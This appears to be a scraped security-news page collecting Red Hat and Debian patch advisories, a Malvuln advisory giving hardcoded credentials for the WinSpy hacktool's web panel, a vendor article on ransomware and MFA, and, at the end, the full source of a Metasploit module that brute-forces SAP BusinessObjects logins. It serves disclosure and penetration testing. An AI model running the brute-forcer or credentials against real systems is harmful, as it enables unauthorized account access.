Red Hat Security Advisory 2024-6310-03 - An update for resource-agents is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6310.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: resource-agents security updateAdvisory ID:        RHSA-2024:6310-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6310Issue date:         2024-09-04Revision:           03CVE Names:          CVE-2024-37891====================================================================Summary: An update for resource-agents is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The resource-agents packages provide the Pacemaker and RGManager service managers with a set of scripts. These scripts interface with several services to allow operating in a high-availability (HA) environment.Security Fix(es):* urllib3: proxy-authorization request header is not stripped during cross-origin redirects (CVE-2024-37891)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-37891References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2292788

Red Hat Security Advisory 2024-6310-03

HackTool.Win32.Freezer.br (WinSpy) malware suffers from an insecure credential storage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/2992129c565e025ebcb0bb6f80c77812.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: HackTool.Win32.Freezer.br (WinSpy)Vulnerability: Insecure Credential StorageDescription: The malware listens on TCP ports 443, 80 and provides a web interface for remote access to victim information like screenshots etc.The username "AZURE" is in a hidden in a file named "resu.dll" under AppData\Local\Temp\Compress0 and the password is stored in cleartext "DREAMS" in "ssap.dll"Family: FreezerType: PE32MD5: 2992129c565e025ebcb0bb6f80c77812SHA256: e47a267cdc2a8443d5d7184e1023eef81c4b6a5bf9ecc24f1c6c345fe98bab8eVuln ID: MVID-2024-0691Disclosure: 09/03/2024Exploit/PoC:Login to the Win-Spy web UI using the credentials "AZURE" / "DREAMS" Web URLs available on the infected host.WebCam Shots (0)http://VICTIM_MACHINE/audio/Screen Shots (16)http://VICTIM_MACHINE/pictures/Reports (2)http://VICTIM_MACHINE/documents/Downloadclog.txtlog.txtDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

HackTool.Win32.Freezer.br (WinSpy) MVID-2024-0691 Insecure Credential Storage

Debian Linux Security Advisory 5764-1 - David Benjamin reported a flaw in the X.509 name checks in OpenSSL, a Secure Sockets Layer toolkit, which may cause an application performing certificate name checks to crash, resulting in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5764-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoSeptember 03, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : opensslCVE ID         : CVE-2024-6119David Benjamin reported a flaw in the X.509 name checks in OpenSSL, aSecure Sockets Layer toolkit, which may cause an application performingcertificate name checks to crash, resulting in denial of service.Additional details can be found in the upstream advisory:https://openssl-library.org/news/secadv/20240903.txtFor the stable distribution (bookworm), this problem has been fixed inversion 3.0.14-1~deb12u2.We recommend that you upgrade your openssl packages.For the detailed security status of openssl please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/opensslFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmbXW1pfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0RXThAAjRoSSUyNd4LR8nETi9XB31OkPVx0KrvU2hfIRnPUHHb3hOoi8vEKxdqhgd1pHtEKUBB3TBkXnyMuQ1p79+wuIjvV6Jr7uEPK0w2GdvC0KaF4+cohRDB7Xpjk+AjVFprvljePzgR9BcX1LWX/Bj6k7j8Jit4hkSDxeWn2W4NvCk9+1FMaHPa1PCmXAxo83qzlJg/SMcI5s19No3TzY9z9RdXH622J6hZk/DUZi6YMSryxCoAuU7ur/Ol8zGH8RG9THiC4hcnAnNjOrqAJqlLzoLgFxykwrvYGwWk//fsQsCeR2HXNQJiPBKq0QyoXP0WFgIbjnQlRfJI2gxwr5KWn77sNnc2vGZ8HXScj+pKOxrdHyp6a3kaZ99ANDCU5UAo36wSUhZyX9I8nNxjZmb2w5fbeFnHkI2xx2onoLeUjv4hzipS4VS0OP5ThqXhXGjLng4L0bIc5Ad/LuC4T/PnXuwfDgMnAQHHM0zjQcDih/TaTfXn1v+j67FIVBxiqD5EI07ms/jysbmpydB4z2Fwl0D09goEtbO2m2ZE+BU4o8dQIk6UB7KiKTBcyVS3uTR7ZG9AbomfHceh9/3ycI0FMTXUXlifU9v3Btuwpb3DnjCwJKaoAEQNrfuV1OjqV29oZd2ye2bwAC2uveAnS0wxe+26Gsr+PhmdUFSGSAPeULt4==KHr5-----END PGP SIGNATURE-----

Debian Security Advisory 5764-1

Red Hat Security Advisory 2024-6297-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6297.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security update  
Advisory ID:        RHSA-2024:6297-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6297  
Issue date:         2024-09-04  
Revision:           03  
CVE Names:          CVE-2021-47138  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: cxgb4: avoid accessing registers when clearing filters (CVE-2021-47138)

* kernel: hv_netvsc: Fix race condition between netvsc_probe and netvsc_remove (CVE-2024-26698)

* kernel: mm/slub: fix to return errno if kmalloc() fails (CVE-2022-48659)

* kernel: Squashfs: check the inode number is not the invalid value of zero (CVE-2024-26982)

* kernel: vt: fix unicode buffer corruption when deleting characters (CVE-2024-35823)

* kernel: nvme-rdma: destroy cm id before destroy qp to avoid use after free (CVE-2021-47378)

* kernel: userfaultfd: fix a race between writeprotect and exit_mmap() (CVE-2021-47461)

* kernel: r8169: Fix possible ring buffer corruption on fragmented Tx packets. (CVE-2024-38586)

* kernel: bpf: Add BPF_PROG_TYPE_CGROUP_SKB attach type enforcement in BPF_LINK_CREATE (CVE-2024-38564)

* kernel: bnxt_re: avoid shift undefined behavior in bnxt_qplib_alloc_init_hwq (CVE-2024-38540)

* kernel: iommu: Fix potential use-after-free during probe (CVE-2022-48796)

* kernel: xfs: add bounds checking to xlog_recover_process_data (CVE-2024-41014)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47138

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2271484  
https://bugzilla.redhat.com/show_bug.cgi?id=2273117  
https://bugzilla.redhat.com/show_bug.cgi?id=2277801  
https://bugzilla.redhat.com/show_bug.cgi?id=2278337  
https://bugzilla.redhat.com/show_bug.cgi?id=2281190  
https://bugzilla.redhat.com/show_bug.cgi?id=2282362  
https://bugzilla.redhat.com/show_bug.cgi?id=2282896  
https://bugzilla.redhat.com/show_bug.cgi?id=2293402  
https://bugzilla.redhat.com/show_bug.cgi?id=2293429  
https://bugzilla.redhat.com/show_bug.cgi?id=2293459  
https://bugzilla.redhat.com/show_bug.cgi?id=2298132  
https://bugzilla.redhat.com/show_bug.cgi?id=2300297

Red Hat Security Advisory 2024-6297-03

Red Hat Security Advisory 2024-6160-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6160.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kernel-rt security updateAdvisory ID:        RHSA-2024:6160-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6160Issue date:         2024-09-03Revision:           03CVE Names:          CVE-2022-48799====================================================================Summary: An update for kernel-rt is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.Security Fix(es):* kernel: net/sched: act_api: fix possible infinite loop in tcf_idr_check_alloc() (CVE-2024-40995)* kernel: perf: Fix list corruption in perf_cgroup_switch() (CVE-2022-48799)* kernel: virtio-net: tap: mlx5_core short frame denial of service (CVE-2024-41090)* kernel: virtio-net: tun: mlx5_core short frame denial of service (CVE-2024-41091)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-48799References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2297579https://bugzilla.redhat.com/show_bug.cgi?id=2298135https://bugzilla.redhat.com/show_bug.cgi?id=2299240https://bugzilla.redhat.com/show_bug.cgi?id=2299336

Red Hat Security Advisory 2024-6160-03

Red Hat Security Advisory 2024-6159-03 - An update for orc is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6159.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: orc security updateAdvisory ID:        RHSA-2024:6159-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6159Issue date:         2024-09-03Revision:           03CVE Names:          CVE-2024-40897====================================================================Summary: An update for orc is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Orc is a library and set of tools for compiling and executing very simple programs that operate on arrays of data.  The \"language\" is a generic assembly language that represents many of the features available in SIMD architectures, including saturated addition and subtraction, and many arithmetic operations.Security Fix(es):* orc: Stack-based buffer overflow vulnerability in ORC (CVE-2024-40897)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-40897References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2300010

Red Hat Security Advisory 2024-6159-03

Red Hat Security Advisory 2024-6156-03 - An update for kernel is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6156.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kernel security updateAdvisory ID:        RHSA-2024:6156-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6156Issue date:         2024-09-03Revision:           03CVE Names:          CVE-2022-48799====================================================================Summary: An update for kernel is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: net/sched: act_api: fix possible infinite loop in tcf_idr_check_alloc() (CVE-2024-40995)* kernel: perf: Fix list corruption in perf_cgroup_switch() (CVE-2022-48799)* kernel: virtio-net: tap: mlx5_core short frame denial of service (CVE-2024-41090)* kernel: virtio-net: tun: mlx5_core short frame denial of service (CVE-2024-41091)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-48799References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2297579https://bugzilla.redhat.com/show_bug.cgi?id=2298135https://bugzilla.redhat.com/show_bug.cgi?id=2299240https://bugzilla.redhat.com/show_bug.cgi?id=2299336

Red Hat Security Advisory 2024-6156-03

A list of topics we covered in the week of August 26 to September 1 of 2024

August 30, 2024 - Iranian spies posing as technical support agents contacted targeted individuals in Israel, Palestine, Iran, the UK, and the US on WhatsApp

August 29, 2024 - A Google search ad for Canva is highly misleading and walks users into a trap.

August 29, 2024 - Telegram CEO Pavel Durov has been arrested in France which raises a lot of questions about the reasons behind the arrest.

August 28, 2024 - Ransomware gangs love sensitive data from healthcare and support organizations to increase their leverage on the victims

August 27, 2024 - Scammers are increasingly using toll fees as a lure in smishing attacks with the aim of grabbing victims' personal details and credit card information.

 A week in security (August 26 &#8211; September 1) 

The FBI and CISA Issue Joint Advisory on New Threats and How to Stop Ransomware
Note: on August 29, the FBI and CISA issued a joint advisory as part of their ongoing #StopRansomware effort to help organizations protect against ransomware. The latest advisory, AA24-242A, describes a new cybercriminal group and its attack methods. It also details three important actions to take today to mitigate

Cybercrime / CISO Insights

****The FBI and CISA Issue Joint Advisory on New Threats and How to Stop Ransomware****

_Note: on August 29, the FBI and CISA issued a joint advisory as part of their ongoing #StopRansomware effort to help organizations protect against ransomware. The latest advisory, AA24-242A, describes a new cybercriminal group and its attack methods. It also details three important actions to take today to mitigate cyber threats from ransomware – Installing updates as soon as they are released, requiring phishing-resistant MFA (i.e. non-SMS text-based), and training users._

The growth in the number of victims of ransomware attacks and data breaches has become so profound that the new cyber defense challenge is just keeping up with the number of new attacks and disclosures from victims. This is the product of stunning advancements in cybercriminal attack methods combined with a too-slow response by many organizations in adjusting to new attack methods. As predicted, Generative AI has indeed been a game changer for cybercriminals attacking organizations and it mandates urgent adjustments to cyber defense strategies.

Through this remarkable transformation in threats, one thing that hasn't changed is the inherent human limitations of everyday users and this is why they are the preferred target for cybercriminals. No amount of training will ever imbue the average user with the super-skills required to detect advanced phishing campaigns or sophisticated deep fakes.

To understand the impact, Token set out to collect perspectives on this pressing subject from cybersecurity leaders in their own words. To accomplish this, Token commissioned Datos Insights, a leading global data and advisory services firm for this research study that reveals the insights and perspectives of leading CISOs and workforce MFA leaders across the U.S. Datos Insights ditched the overused multiple choice questionnaire approach and conducted qualitative 60-minute video interviews to examine CISO perspectives in depth. In this article, we will examine the valuable insights gained from the research.

****CISOs are unanimous that user vulnerabilities are their number one risk****

Attack vectors are advancing in sophistication through the adoption of artificial intelligence capabilities, specifically generative AI, making them more difficult for CISOs and their teams to defend against. Cybercriminals most frequently target employees at large organizations through phishing attacks to gain network access. CISA reports that 90% of ransomware attacks are the result of phishing.

**Increase your organization's security with insights from industry leaders.** Download the _"CISO Perspectives on Multifactor Authentication"_ report to uncover how top CISOs are navigating the evolving landscape of identity and access management, and learn how you can implement cutting-edge MFA strategies to protect your workforce and fortify your defenses against emerging threats.

Advanced Phishing Attacks remain the most effective tool in a hacker's arsenal. These attacks have become more targeted and sophisticated with the use of Gen AI. Gen AI also enables the launching of spear phishing attacks targeted at specific individuals within an organization on a large scale and with greater detail, leveraging real data about the organization and its employees to appear authentic. The tell-tale signs of phishing emails are rapidly disappearing as these emails are increasingly indistinguishable from legitimate communications. This will soon negate the value of user training.

The above is further compounded by the rise of Deepfake technology as Gen AI has given birth to new forms of social engineering attacks. Cybercriminals are now using AI-generated voices and videos to impersonate executives and other trusted individuals. These are being executed via phone calls from trusted phone numbers that are spoofed by the attackers and via Zoom conference calls where cybercriminals impersonate known and trusted colleagues. Attackers have been successful in convincing employees to transfer funds, share credentials, and perform other actions that can compromise security. These attacks exploit the inherent trust that employees place in familiar voices and faces, making them exceptionally dangerous.

The tools to conduct these attacks are now available to billions on the dark web with no specialized skills required. Phishing and ransomware attacks were once the exclusive realm of expert cybercriminals, but with the advent of generative AI and new cybercrime tools, launching these attacks has become accessible to anyone with access to the dark web, which is anyone with a computing device and an internet connection. Ransomware-as-a-Service (RaaS) and AI-driven tools available on the dark web have simplified the process, eliminating the need for advanced skills. This shift enables individuals with minimal technical knowledge to execute sophisticated cyberattacks with just a computer and internet connection. The gig economy meets the next generation of cyber attacks.

****New attacks require new defense strategies****

Phishing-Resistant MFA Adoption is critical and no longer a nice to have. With phishing attacks as the top cyber threat for enterprises, legacy MFA is being proven increasingly inadequate as the numbers of victims substantiate. Many legacy MFA solutions are decades-old technology. The current report highlights the urgency of deploying phishing-resistant, next-generation MFA solutions, especially in the face of AI-enhanced phishing attacks. CISOs should accelerate the shift toward MFA solutions that are hardware-based, use biometrics, and are FIDO compliant. These significantly mitigate phishing and ransomware attacks and would have prevented the overwhelming majority of current ransomware attacks saving organizations a combined billions of dollars in losses in the last year alone.

Next-generation MFA is best implemented with targeted deployments for privileged users. The report emphasizes the importance of prioritizing the deployment of next-generation MFA to high-risk users within the enterprise, particularly systems administrators and executives. CISOs need to improve risk management for System Administrators despite having privileged access management (PAM) solutions. "PAM solutions have functioned as the historical norm for CISOs managing system admin risks." The rise of phishing and insider attacks necessitates that CISOs prioritize MFA upgrade deployments at this important business risk. The report found that senior executives at many firms lack robust security solutions aligned with their business functions and business risk. Almost none of the CISOs interviewed had distinct controls deployed for their executive users. With spear-phishing and other techniques on the rise, this gap was unexpected and troubling.

****Conclusion****

The techniques used by cybercriminals are constantly evolving, but never so rapidly as over the past twelve months. We have surpassed the capacity of our users to be our first line of cyber defense and we have not given them any new tools beyond those developed years or decades ago. By staying informed about the latest threats and implementing a multi-layered defense strategy that emphasizes upgrading to phishing-resistant, next-generation MFA, organizations can protect their users' identities and stop cybercriminals from gaining unauthorized access to data and sensitive operations. Protecting your users from new attacks requires vigilance, education, and the right tools. By prioritizing these areas, organizations can significantly reduce the risk of a successful cyberattack and maintain the trust of their customers and stakeholders.

Learn more about how Token's Next-Generation MFA can stop phishing and ransomware from harming your organization at tokenring.com

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Next-Generation Attacks, Same Targets - How to Protect Your Users' Identities

This Metasploit module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::AuthBrute  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'       => 'SAP BusinessObjects Web User Bruteforcer',      'Description'  => 'This module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.',      'References'  =>        [          # General          [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ]        ],      'Author'     => [ 'Joshua Abraham <jabra[at]rapid7.com>' ],      'License'    => MSF_LICENSE    )    register_options(      [        Opt::RPORT(6405),      ])    register_autofilter_ports([ 6405 ])  end  def run_host(ip)    res = send_request_cgi({      'uri'   => "/PlatformServices/service/app/logon.object",      'method'  => 'GET'    }, 25)    return if not res    each_user_pass { |user, pass|      enum_user(user,pass)    }  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: opts[:service_name],      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user],      private_data: opts[:password],      private_type: :password    }.merge(service_data)    login_data = {      last_attempted_at: Time.now,      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::SUCCESSFUL,      proof: opts[:proof]    }.merge(service_data)    create_credential_login(login_data)  end  def enum_user(user, pass)    vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' password: '#{pass}'")    success = false    data = 'isFromLogonPage=true&cms=127.0.1%3A6400'    data << "&username=#{Rex::Text.uri_encode(user.to_s)}"    data << "&password=#{Rex::Text.uri_encode(pass.to_s)}"    data << '&authType=secEnterprise&backUrl=%2FApp%2Fhome.faces'    begin      res = send_request_cgi({        'uri'      => '/PlatformServices/service/app/logon.object',        'data'     => data,        'method'     => 'POST',        'headers'    =>              {                'Connection' => "keep-alive",                'Accept-Encoding' => "gzip,deflate",              },      }, 45)      return :abort if (!res or (res and res.code != 200))      if(res.body.match(/Account Information/i))        success = false      else        success = true        success      end    rescue ::Rex::ConnectionError      vprint_error("[SAP BusinessObjects] Unable to attempt authentication")      return :abort    end    if success      print_good("[SAP BusinessObjects] Successful login '#{user}' password: '#{pass}'")      report_cred(        ip: rhost,        port: rport,        service_name: 'sap-businessobjects',        user: user,        password: pass,        proof: res.body      )      return :next_user    else      vprint_error("[SAP BusinessObjects] failed to login as '#{user}' password: '#{pass}'")      return    end  endend

Tag

#sap